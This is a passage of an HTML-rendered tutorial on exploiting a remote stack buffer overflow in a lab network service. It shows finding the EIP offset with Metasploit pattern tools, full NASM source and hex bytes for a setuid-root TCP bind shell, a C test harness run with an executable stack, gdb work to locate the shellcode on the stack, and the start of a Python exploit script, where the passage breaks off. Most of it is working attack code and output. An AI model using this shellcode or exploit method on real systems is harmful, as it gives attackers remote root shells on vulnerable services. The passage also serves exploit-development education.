t5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gkquot;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41367241 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/usr/share/metasploit-framework/tools$ /span./pattern_offset.rb span class="m"41367241/span/span span class="code-line"span class="go"[*] Exact match at offset 528/span/span span class="code-line"/code/pre/div /td/tr/table pGreat! So both methods agree. :-)/p h2Developing The Exploit/h2 pSo now to start developing the exploit, which brings us to our second major difference when attacking a remote application./p pIn parts 1 and 2 we put our a href="https://en.wikipedia.org/wiki/Shellcode" target="_blank"shellcode/a inside an environment variable but with a network application we don't have that ability so the shellcode has to be sent to the server some other way. The most obvious way is to send it with our exploit payload which is what we will do here./p pThis also brings up another important feature of shellcode development, our payload is being put through 'strncpy' which means if it contains any null bytes '\x00' then it will cut our shellcode short and ultimately break the exploit. The shellcode I wrote and used in the first 2 parts had no null bytes but this wasn't necessary because we were storing it in a variable but as we can't do that now it is important that there are no null's./p pThe third major difference is obviously the shellcode, the pervious shellcode just launched a shell, that would be useless here because we need a way to connect to the shell so we have to also create a network socket and either bind to a port so we can connect to it or connect out to another machine./p pI've chosen to write a TCP bindshell for this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="c1"; set up a socket listening on port 9998/span/span span class="code-line"span class="c1"; once we receive a connection duplicate/span/span span class="code-line"span class="c1"; stdin, stdout and stderr to run over that/span/span span class="code-line"span class="c1"; client socket and execute execve with/span/span span class="code-line"span class="c1"; /bin/bash/span/span span class="code-line"/span span class="code-line"span class="k"global /spanspan class="nv"_start/span/span span class="code-line"/span span class="code-line"span class="k"section /spanspan class="nv".text/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/span/span span class="code-line" span class="nf"xor/span span class="nb"eax/spanspan class="p",/span span class="nb"eax/span span class="c1"; zero out all the registers/span/span span class="code-line" span class="nf"xor/span span class="nb"ebx/spanspan class="p",/span span class="nb"ebx/span/span span class="code-line" span class="nf"xor/span span class="nb"ecx/spanspan class="p",/span span class="nb"ecx/span/span span class="code-line" span class="nf"xor/span span class="nb"edx/spanspan class="p",/span span class="nb"edx/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0x17/span span class="c1"; put 23 into eax to setuid/span/span span class="code-line"/span span class="code-line" span class="nf"xor/span span class="nb"ebx/spanspan class="p",/span span class="nb"ebx/span span class="c1"; zero out ebx/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; make the syscall setuid/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"eax/spanspan class="p",/span span class="nb"ebx/span span class="c1"; zero out eax again/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0x66/span span class="c1"; put the sys call number 102 into eax/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"bl/spanspan class="p",/span span class="mh"0x1/span span class="c1"; select SOCKET to create a new socket/span/span span class="code-line"/span span class="code-line" span class="nf"push/span span class="nb"ecx/span span class="c1"; push the arguments onto the stack in/span/span span class="code-line" span class="c1"; reverse order and null terminate/span/span span class="code-line" span class="nf"push/span span class="mh"0x1/span span class="c1"; SOCK_STREAM/span/span span class="code-line" span class="nf"push/span span class="mh"0x2/span span class="c1"; AF_INET/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"ecx/spanspan class="p",/span span class="nb"esp/span span class="c1"; move the address of the arguments/span/span span class="code-line" span class="c1"; into ecx/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; execute the syscall socketcall SOCKET/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"esi/spanspan class="p",/span span class="nb"eax/span span class="c1"; move the descriptor returned into/span/span span class="code-line" span class="c1"; esi for use later/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0x66/span span class="c1"; put the sys call number 102 into eax/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"bl/spanspan class="p",/span span class="mh"0x2/span span class="c1"; select BIND to bind to a port/span/span span class="code-line"/span span class="code-line" span class="nf"push/span span class="nb"edx/span span class="c1"; push the struct sockaddr onto the stack in/span/span span class="code-line" span class="c1"; reverse order and null terminate/span/span span class="code-line" span class="nf"push/span span class="kt"WORD/span span class="mh"0x0e27/span span class="c1"; port 9998/span/span span class="code-line" span class="nf"push/span span class="nb"bx/span span class="c1"; AF_INET/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"ecx/spanspan class="p",/span span class="nb"esp/span span class="c1"; move the address of the struct sockaddr/span/span span class="code-line" span class="c1"; into ecx/span/span span class="code-line"/span span class="code-line" span class="nf"push/span span class="mh"0x10/span span class="c1"; socklen_t argument (16)/span/span span class="code-line" span class="nf"push/span span class="nb"ecx/span span class="c1"; struct sockaddr/span/span span class="code-line" span class="nf"push/span span class="nb"esi/span span class="c1"; descriptor returned by the call to socket/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"ecx/spanspan class="p",/span span class="nb"esp/span span class="c1"; move the address of the arguments/span/span span class="code-line" span class="c1"; into ecx/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; execute the syscall socketcall BIND/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0x66/span span class="c1"; put the sys call number 102 into eax/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"bl/spanspan class="p",/span span class="mh"0x4/span span class="c1"; select LISTEN/span/span span class="code-line"/span span class="code-line" span class="nf"push/span span class="mh"0x1/span span class="c1"; push arguments to bind onto the stack/span/span span class="code-line" span class="c1"; in reverse/span/span span class="code-line" span class="nf"push/span span class="nb"esi/span span class="c1"; push descriptor returned by call to socket/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"ecx/spanspan class="p",/span span class="nb"esp/span span class="c1"; move the address of the arguments/span/span span class="code-line" span class="c1"; into ecx/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; execute the syscall socketcall LISTEN/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0x66/span span class="c1"; put the sys call number 102 into eax/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"bl/spanspan class="p",/span span class="mh"0x5/span span class="c1"; select ACCEPT to start accepting connections/span/span span class="code-line"/span span class="code-line" span class="nf"push/span span class="nb"edx/span span class="c1"; push arguments to accept onto the stack/span/span span class="code-line" span class="nf"push/span span class="nb"edx/span span class="c1"; in reverse order we only need the destriptor/span/span span class="code-line" span class="nf"push/span span class="nb"esi/span span class="c1"; here/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"ecx/spanspan class="p",/span span class="nb"esp/span span class="c1"; move the address of the arguments/span/span span class="code-line" span class="c1"; into ecx/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; execute the syscall socketcall ACCEPT/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"ebx/spanspan class="p",/span span class="nb"eax/span span class="c1"; move the descriptor returned by accept/span/span span class="code-line" span class="c1"; into ebx to be the first argument to/span/span span class="code-line" span class="c1"; dup2/span/span span class="code-line"/span span class="code-line" span class="nf"xor/span span class="nb"ecx/spanspan class="p",/span span class="nb"ecx/span span class="c1"; zero out ecx/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"cl/spanspan class="p",/span span class="mh"0x3/span span class="c1"; get the ecx register ready to decrement/span/span span class="code-line"/span span class="code-line"span class="nl"dupfd:/span span class="c1"; the label for our loop through stdin, stdout and stderr/span/span span class="code-line"/span span class="code-line" span class="nf"dec/span span class="nb"cl/span span class="c1"; decrement ecx so we include 2, 1 and 0/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0x3f/span span class="c1"; put the sys call number 63 into eax/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; execute the syscall dup2/span/span span class="code-line"/span span class="code-line" span class="nf"jne/span span class="nv"dupfd/span span class="c1"; create the loop/span/span span class="code-line"/span span class="code-line" span class="nf"xor/span span class="nb"eax/spanspan class="p",/span span class="nb"eax/span span class="c1"; zero out eax/span/span span class="code-line"/span span class="code-line" span class="nf"push/span span class="nb"edx/span span class="c1"; null terminate the string/span/span span class="code-line" span class="nf"push/span span class="mh"0x68736162/span span class="c1"; push the string ////bin/bash/span/span span class="code-line" span class="nf"push/span span class="mh"0x2f6e6962/span span class="c1"; in reverse/span/span span class="code-line" span class="nf"push/span span class="mh"0x2f2f2f2f/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"ebx/spanspan class="p",/span span class="nb"esp/span span class="c1"; move the address of the string into ebx/span/span span class="code-line"/span span class="code-line" span class="nf"push/span span class="nb"edx/span span class="c1"; push the second argument to execve onto the/span/span span class="code-line" span class="nf"push/span span class="nb"ebx/span span class="c1"; stack in reverse order/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"ecx/spanspan class="p",/span span class="nb"esp/span span class="c1"; move the address of the 2nd argument/span/span span class="code-line" span class="c1"; into ecx/span/span span class="code-line"/span span class="code-line" span class="nf"push/span span class="nb"edx/span span class="c1"; the thrid argument to execve/span/span span class="code-line" span class="nf"mov/span span class="nb"edx/spanspan class="p",/span span class="nb"esp/span span class="c1"; a null pointer/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="nb"al/spanspan class="p",/span span class="mh"0xb/span span class="c1"; put the sys call number 11 into eax/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; execute the syscall execve/span/span span class="code-line"/code/pre/div /td/tr/table pNow to assemble, link and test the shellcode:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spannasm -f elf32 -o bindshell.o bindshell.nasm/span span class="code-line"span class="gp"[email protected]:~$ /spanld -o bindshell bindshell.o/span span class="code-line"span class="gp"[email protected]:~$ /spanobjdump -d ./bindshellspan class="p"|/spangrep span class="s1"#39;[0-9a-f]:#39;/spanspan class="p"|/spangrep -v span class="s1"#39;file#39;/spanspan class="p"|/spancut -f2 -d:span class="p"|/spancut -f1-6 -dspan class="s1"#39; #39;/spanspan class="p"|/spantr -s span class="s1"#39; #39;/spanspan class="p"|/spantr span class="s1"#39;\t#39;/span span class="s1"#39; #39;/spanspan class="p"|/spansed span class="s1"#39;s/ $//g#39;/spanspan class="p"|/spansed span class="s1"#39;s/ /\\x/g#39;/spanspan class="p"|/spanpaste -d span class="s1"#39;#39;/span -s span class="p"|/spansed span class="s1"#39;s/^/quot;/#39;/spanspan class="p"|/spansed span class="s1"#39;s/$/quot;/g#39;/span/span span class="code-line"span class="go"quot;\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80quot;/span/span span class="code-line"span class="gp"[email protected]:~$ /spancat shellcode.c/span span class="code-line"span class="gp"#/spanincludelt;stdio.hgt;/span span class="code-line"span class="gp"#/spanincludelt;string.hgt;/span span class="code-line"/span span class="code-line"span class="go"unsigned char code[] = \/span/span span class="code-line"span class="go"quot;\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80quot;;/span/span span class="code-line"/span span class="code-line"span class="go"main()/span/span span class="code-line"span class="go"{/span/span span class="code-line"/span span class="code-line"span class="go" printf(quot;Shellcode Length: %d\nquot;, strlen(code));/span/span span class="code-line"/span span class="code-line"span class="go" int (*ret)() = (int(*)())code;/span/span span class="code-line"/span span class="code-line"span class="go" ret();/span/span span class="code-line"/span span class="code-line"span class="go"}/span/span span class="code-line"span class="gp"[email protected]:~$ /spangcc -z execstack -fno-stack-protector -o shellcode shellcode.c/span span class="code-line"span class="gp"[email protected]:~$ /span./shellcode/span span class="code-line"span class="go"Shellcode Length: 119/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"whoami/span/span span class="code-line"span class="go"testuser/span/span span class="code-line"/code/pre/div /td/tr/table pSo our shellcode works, lastly we need to figure out where our shellcode will land, one thing you will need to know is that when you start an application using codegdb/code, the memory layout of the stack is slightly different to when its started on its own (we saw this in part 2 where we kept having to adjust our attack inside and outside of codegdb/code)./p pOur shellcode is going to be stored on the stack so we need to start the application outside of codegdb/code and attach to it in another root terminal so we get the right position that our shellcode will be at:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app-net /span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~# /spanps ax span class="p"|/span grep app-net/span span class="code-line"span class="go"19269 pts/0 S+ 0:00 ./app-net/span/span span class="code-line"span class="go"22791 pts/1 S+ 0:00 grep app-net/span/span span class="code-line"span class="gp"[email protected]:~# /spangdb -q -p span class="m"19269/span/span span class="code-line"span class="go"Attaching to process 19269/span/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Reading symbols from /lib/i386-linux-gnu/i686/cmov/libc.so.6...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="go"Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/ld-linux.so.2/span/span span class="code-line"span class="go"0xb7fe1424 in __kernel_vsyscall ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*532#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/20xw $esp/span/span span class="code-line"span class="go"0xbffff390: 0xbfff000a 0xbffff3b4 0x000003e8 0x00000000/span/span span class="code-line"span class="go"0xbffff3a0: 0xbffff7a0 0xbffff79c 0x000057a8 0x00000006/span/span span class="code-line"span class="go"0xbffff3b0: 0x00001000 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbffff3c0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbffff3d0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"/code/pre/div /td/tr/table pSo our shellcode will start at code0xbffff3b4/code (its the second column on the row starting code0xbffff3b0/code, each column is 4 bytes long so code0xbffff3b0/code + 4 = code0xbffff3b4/code), this is the address that we need to overwrite EIP with./p pNow we have the length of our shellcode (119), the address we start overwriting on the stack and the number of bytes until we overwrite EIP, we can write our exploit:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"socket/span/span span class="code-line"/span span class="code-line"span class="n"shellcode/span span class="o"=/span span class="s2"quot;/spanspan 